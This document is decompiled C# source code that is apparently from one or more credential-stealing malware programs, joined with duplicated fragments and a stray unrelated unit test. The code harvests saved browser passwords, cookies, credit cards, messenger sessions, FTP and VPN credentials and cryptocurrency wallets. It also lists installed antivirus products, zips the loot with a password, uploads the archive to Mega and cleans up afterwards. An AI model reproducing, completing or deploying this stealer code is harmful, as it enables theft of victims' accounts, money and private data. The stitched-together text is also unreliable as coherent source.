Collection.GetGecko();
});
CS$ < > 8__locals4.t2 = array3;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals5 = CS$ < > 8__locals1;
Task[] array4 = new Task[1];
array4[0] = new Task(delegate()
{
Edge.GetEdge(Help.Passwords);
});
CS$ < > 8__locals5.t3 = array4;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals6 = CS$ < > 8__locals1;
Task[] array5 = new Task[1];
array5[0] = new Task(delegate()
{
Outlook.GrabOutlook(Help.collectionDir);
});
CS$ < > 8__locals6.t4 = array5;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals7 = CS$ < > 8__locals1;
Task[] array6 = new Task[1];
array6[0] = new Task(delegate()
{
FileZilla.GetFileZilla(Help.collectionDir);
});
CS$ < > 8__locals7.t5 = array6;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals8 = CS$ < > 8__locals1;
Task[] array7 = new Task[1];
array7[0] = new Task(delegate()
{
TotalCommander.GetTotalCommander(Help.collectionDir);
});
CS$ < > 8__locals8.t6 = array7;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals9 = CS$ < > 8__locals1;
Task[] array8 = new Task[1];
array8[0] = new Task(delegate()
{
ProtonVPN.GetProtonVPN(Help.collectionDir);
});
CS$ < > 8__locals9.t7 = array8;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals10 = CS$ < > 8__locals1;
Task[] array9 = new Task[1];
array9[0] = new Task(delegate()
{
OpenVPN.GetOpenVPN(Help.collectionDir);
});
CS$ < > 8__locals10.t8 = array9;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals11 = CS$ < > 8__locals1;
Task[] array10 = new Task[1];
array10[0] = new Task(delegate()
{
NordVPN.GetNordVPN(Help.collectionDir);
});
CS$ < > 8__locals11.t9 = array10;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals12 = CS$ < > 8__locals1;
Task[] array11 = new Task[1];
array11[0] = new Task(delegate()
{
Telegram.GetTelegram(Help.collectionDir);
});
CS$ < > 8__locals12.t10 = array11;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals13 = CS$ < > 8__locals1;
Task[] array12 = new Task[1];
array12[0] = new Task(delegate()
{
Discord.GetDiscord(Help.collectionDir);
});
CS$ < > 8__locals13.t11 = array12;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals14 = CS$ < > 8__locals1;
Task[] array13 = new Task[1];
array13[0] = new Task(delegate()
{
Wallets.GetWallets(Help.collectionDir);
});
CS$ < > 8__locals14.t12 = array13;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals15 = CS$ < > 8__locals1;
Task[] array14 = new Task[1];
array14[0] = new Task(delegate()
{
Systemsinfo.GetSystemsData(Help.collectionDir);
});
CS$ < > 8__locals15.t13 = array14;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals16 = CS$ < > 8__locals1;
Task[] array15 = new Task[1];
array15[0] = new Task(delegate()
{
DomainDetect.GetDomainDetect(Help.Browsers);
});
CS$ < > 8__locals16.t14 = array15;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals17 = CS$ < > 8__locals1;
Task[] array16 = new Task[1];
array16[0] = new Task(delegate()
{
Dec.Decrypt(Help.Passwords);
});
CS$ < > 8__locals17.t15 = array16;
try
{
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t0;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t1;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t2;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t3;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t4;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t5;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t6;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t7;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t8;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t9;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t10;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t11;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t12;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t13;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t14;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t15;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
Task.WaitAll(CS$ < > 8__locals1.t0);
Task.WaitAll(CS$ < > 8__locals1.t1);
Task.WaitAll(CS$ < > 8__locals1.t2);
Task.WaitAll(CS$ < > 8__locals1.t3);
Task.WaitAll(CS$ < > 8__locals1.t4);
Task.WaitAll(CS$ < > 8__locals1.t5);
Task.WaitAll(CS$ < > 8__locals1.t6);
Task.WaitAll(CS$ < > 8__locals1.t7);
Task.WaitAll(CS$ < > 8__locals1.t8);
Task.WaitAll(CS$ < > 8__locals1.t9);
Task.WaitAll(CS$ < > 8__locals1.t10);
Task.WaitAll(CS$ < > 8__locals1.t11);
Task.WaitAll(CS$ < > 8__locals1.t12);
Task.WaitAll(CS$ < > 8__locals1.t13);
Task.WaitAll(CS$ < > 8__locals1.t14);
Task.WaitAll(CS$ < > 8__locals1.t15);
}
catch
{
}
string contents = string.Concat(new string[]
{
JsonValue.buildversion,
"\n\ud83d\udc64 ",
Help.machineName,
"/",
Help.userName,
"\n\ud83c\udff4 IP: ",
Help.IP(),
Help.Country(),
"\n\ud83c\udf10 Browsers Data\n ∟\ud83d\udd11\n ∟Chromium v1: ",
Chromium.Passwords.ToString(),
"\n ∟Chromium v2: ",
Dec.colvo.ToString(),
"\n ∟Edge: ",
Edge.count.ToString(),
"\n ∟Gecko: ",
Steal.count.ToString(),
"\n ∟\ud83c\udf6a",
(Chromium.Cookies + Steal.count_cookies).ToString(),
"\n ∟\ud83d\udd51",
Chromium.History.ToString(),
"\n ∟\ud83d\udcdd",
Chromium.Autofills.ToString(),
"\n ∟\ud83d\udcb3",
Chromium.CC.ToString(),
"\n ∟⨭",
Chromium.Downloads.ToString(),
"\n\ud83d\udcb6 Wallets: ",
(Wallets.count > 0) ? "✅" : "❌",
(Electrum.count > 0) ? " Electrum" : "",
(Armory.count > 0) ? " Armory" : "",
(AtomicWallet.count > 0) ? " Atomic" : "",
(BitcoinCore.count > 0) ? " BitcoinCore" : "",
(Bytecoin.count > 0) ? " Bytecoin" : "",
(DashCore.count > 0) ? " DashCore" : "",
(Ethereum.count > 0) ? " Ethereum" : "",
(Exodus.count > 0) ? " Exodus" : "",
(LitecoinCore.count > 0) ? " LitecoinCore" : "",
(Monero.count > 0) ? " Monero" : "",
(Zcash.count > 0) ? " Zcash" : "",
(Jaxx.count > 0) ? " Jaxx" : "",
"\n\ud83d\udcc2 FileGrabber: ",
Files.count.ToString(),
"\n\ud83d\udcac Discord: ",
(Discord.count > 0) ? "✅" : "❌",
"\n✈️ Telegram: ",
(Telegram.count > 0) ? "✅" : "❌",
"\n\ud83d\udca1 Jabber: ",
(Startjabbers.count + Pidgin.PidginCount > 0) ? "✅" : "❌",
(Pidgin.PidginCount > 0) ? (" Pidgin (" + Pidgin.PidginAkks.ToString() + ")") : "",
(Startjabbers.count > 0) ? " Psi" : "",
"\n\ud83d\udce1 FTP\n ∟ FileZilla: ",
(FileZilla.count > 0) ? ("✅ (" + FileZilla.count.ToString() + ")") : "❌",
"\n ∟ TotalCmd: ",
(TotalCommander.count > 0) ? "✅" : "❌",
"\n\ud83d\udd0c VPN\n ∟ NordVPN: ",
(NordVPN.count > 0) ? "✅" : "❌",
"\n ∟ OpenVPN: ",
(OpenVPN.count > 0) ? "✅" : "❌",
"\n ∟ ProtonVPN: ",
(ProtonVPN.count > 0) ? "✅" : "❌",
"\n\ud83c\udd94 HWID: ",
Help.HWID,
"\n⚙️ ",
Systemsinfo.GetOSInformation(),
"\n\ud83d\udd0e ",
File.ReadAllText(Help.Browsers + "\\DomainDetect.txt")
});
File.WriteAllText(Help.collectionDir + "\\InfoHERE.txt", contents);
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("Упаковка архива");
string text = string.Concat(new string[]
{
Help.dir,
"\\",
Help.userName,
"_",
Help.machineName,
Help.CountryCOde(),
".zip"
});
using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866")))
{
zipFile.ParallelDeflateThreshold = -1L;
zipFile.UseZip64WhenSaving = Zip64Option.Always;
zipFile.CompressionLevel = CompressionLevel.Default;
zipFile.Password = Program.passwordzip;
zipFile.AddDirectory(Help.collectionDir);
try
{
zipFile.Save(text);
}
catch
{
text = Help.dir + "\\" + Help.HWID + ".zip";
zipFile.Save(text);
}
}
Console.WriteLine("Залив на мегу");
MegaSend.Send(text);
Clean.GetClean();
}
public static Credentials Create(ClientSettings settings)
{
Credentials credentials = new Credentials
{
Browsers = new List <Browser>(),
Files = new List <RemoteFile>(),
FtpConnections = new List <LoginPair>(),
Hardwares = new List <Hardware>(),
InstalledBrowsers = new List <InstalledBrowserInfo>(),
InstalledSoftwares = new List <string>(),
Languages = new List <string>(),
Processes = new List <string>(),
Defenders = new List <string>()
};
try
{
WmiService wmiService = new WmiService();
try
{
ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>(new WmiProcessorQuery());
credentials.Hardwares = source.Select((WmiProcessor x) => new Hardware
{
Caption = x.Name,
HardType = HardwareType.Processor,
Parameter = $"{x.NumberOfCores}"
}).ToList();
}
catch
{
}
try
{
if (credentials.Hardwares == null)
{
credentials.Hardwares = new List <Hardware>();
}
foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery())
where x.AdapterRAM != 0
select new Hardware
{
Caption = x.Name,
HardType = HardwareType.Graphic,
Parameter = $"{x.AdapterRAM}"
}).ToList())
{
credentials.Hardwares.Add(item);
}
}
catch
{
}
try
{
List <WmiQueryBase> list = new List <WmiQueryBase>
{
new WmiAntivirusQuery(),
new WmiAntiSpyWareQuery(),
new WmiFirewallQuery()
};
string[] array = new string[2]
{
"ROOT\\SecurityCenter2",
"ROOT\\SecurityCenter"
};
List <WmiAntivirus> list2 = new List <WmiAntivirus>();
foreach (WmiQueryBase item2 in list)
{
string[] array2 = array;
foreach (string scope in array2)
{
try
{
list2.AddRange(wmiService.QueryAll <WmiAntivirus>(item2, new ManagementObjectSearcher(scope, string.Empty)).ToList());
}
catch
{
}
}
}
credentials.Defenders = list2.Select((WmiAntivirus x) => x.DisplayName).Distinct().ToList();
}
catch
{
}
credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers();
credentials.Processes = UserInfoHelper.ListOfProcesses();
credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms();
credentials.Languages = UserInfoHelper.AvailableLanguages();
if (settings.GrabBrowsers)
{
List <Browser> list3 = new List <Browser>();
list3.AddRange(ChromiumEngine.ParseBrowsers());
list3.AddRange(GeckoEngine.ParseBrowsers());
list3.Add(EdgeEngine.ParseBrowsers());
foreach (Browser item3 in list3)
{
if (!item3.IsEmpty())
{
credentials.Browsers.Add(item3);
}
}
}
if (settings.GrabFiles)
{
credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths);
}
if (settings.GrabFTP)
{
List <LoginPair> list4 = new List <LoginPair>();
list4.AddRange(FileZilla.ParseConnections());
list4.AddRange(WinSCP.ParseConnections());
credentials.FtpConnections = list4;
}
if (settings.GrabImClients)
{
foreach (LoginPair item4 in Pidgin.ParseConnections())
{
credentials.FtpConnections.Add(item4);
}
return(credentials);
}
return(credentials);
}
catch
{
return(credentials);
}
}
public static Credentials Create(ClientSettings settings)
{
Credentials credentials = new Credentials()
{
Browsers = (IList <Browser>) new List <Browser>(),
Files = (IList <RemoteFile>) new List <RemoteFile>(),
FtpConnections = (IList <LoginPair>) new List <LoginPair>(),
Hardwares = (IList <Hardware>) new List <Hardware>(),
InstalledBrowsers = (IList <InstalledBrowserInfo>) new List <InstalledBrowserInfo>(),
InstalledSoftwares = (IList <string>) new List <string>(),
Languages = (IList <string>) new List <string>(),
Processes = (IList <string>) new List <string>(),
Defenders = (IList <string>) new List <string>()
};
try
{
WmiService wmiService = new WmiService();
try
{
ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>((WmiQueryBase) new WmiProcessorQuery(), (ManagementObjectSearcher)null);
credentials.Hardwares = (IList <Hardware>)source.Select <WmiProcessor, Hardware>((Func <WmiProcessor, Hardware>)(x => new Hardware()
{
Caption = x.Name,
HardType = HardwareType.Processor,
Parameter = string.Format("{0}", (object)x.NumberOfCores)
})).ToList <Hardware>();
}
catch
{
}
try
{
if (credentials.Hardwares == null)
{
credentials.Hardwares = (IList <Hardware>) new List <Hardware>();
}
foreach (Hardware hardware in wmiService.QueryAll <WmiGraphicCard>((WmiQueryBase) new WmiGraphicCardQuery(), (ManagementObjectSearcher)null).Where <WmiGraphicCard>((Func <WmiGraphicCard, bool>)(x => x.AdapterRAM > 0U)).Select <WmiGraphicCard, Hardware>((Func <WmiGraphicCard, Hardware>)(x => new Hardware()
{
Caption = x.Name,
HardType = HardwareType.Graphic,
Parameter = string.Format("{0}", (object)x.AdapterRAM)
})).ToList <Hardware>())
{
credentials.Hardwares.Add(hardware);
}
}
catch
{
}
try
{
List <WmiQueryBase> wmiQueryBaseList = new List <WmiQueryBase>()
{
(WmiQueryBase) new WmiAntivirusQuery(),
(WmiQueryBase) new WmiAntiSpyWareQuery(),
(WmiQueryBase) new WmiFirewallQuery()
};
string[] strArray = new string[2]
{
"ROOT\\SecurityCenter2",
"ROOT\\SecurityCenter"
};
List <WmiAntivirus> source = new List <WmiAntivirus>();
foreach (WmiQueryBase wmiQuery in wmiQueryBaseList)
{
foreach (string scope in strArray)
{
try
{
source.AddRange((IEnumerable <WmiAntivirus>)wmiService.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>());
}
catch
{
}
}
}
credentials.Defenders = (IList <string>)source.Select <WmiAntivirus, string>((Func <WmiAntivirus, string>)(x => x.DisplayName)).Distinct <string>().ToList <string>();
}
catch
{
}
credentials.InstalledBrowsers = (IList <InstalledBrowserInfo>)UserInfoHelper.GetBrowsers();
credentials.Processes = (IList <string>)UserInfoHelper.ListOfProcesses();
credentials.InstalledSoftwares = (IList <string>)UserInfoHelper.ListOfPrograms();
credentials.Languages = (IList <string>)UserInfoHelper.AvailableLanguages();
if (settings.GrabBrowsers)
{
List <Browser> browserList = new List <Browser>();
browserList.AddRange((IEnumerable <Browser>)ChromiumEngine.ParseBrowsers());
browserList.AddRange((IEnumerable <Browser>)GeckoEngine.ParseBrowsers());
browserList.Add(EdgeEngine.ParseBrowsers());
foreach (Browser browser in browserList)
{
if (!browser.IsEmpty())
{
credentials.Browsers.Add(browser);
}
}
}
if (settings.GrabFiles)
{
credentials.Files = RemoteFileGrabber.ParseFiles((IEnumerable <string>)settings.GrabPaths);
}
if (settings.GrabFTP)
{
List <LoginPair> loginPairList = new List <LoginPair>();
loginPairList.AddRange((IEnumerable <LoginPair>)FileZilla.ParseConnections());
loginPairList.AddRange((IEnumerable <LoginPair>)WinSCP.ParseConnections());
credentials.FtpConnections = (IList <LoginPair>)loginPairList;
}
if (settings.GrabImClients)
{
foreach (LoginPair connection in Pidgin.ParseConnections())
{
credentials.FtpConnections.Add(connection);
}
}
}
catch
{
}
return(credentials);
}
public void Test_implementsSearchForNewer()
{
var fz = new FileZilla(false);
Assert.IsTrue(fz.implementsSearchForNewer());
}
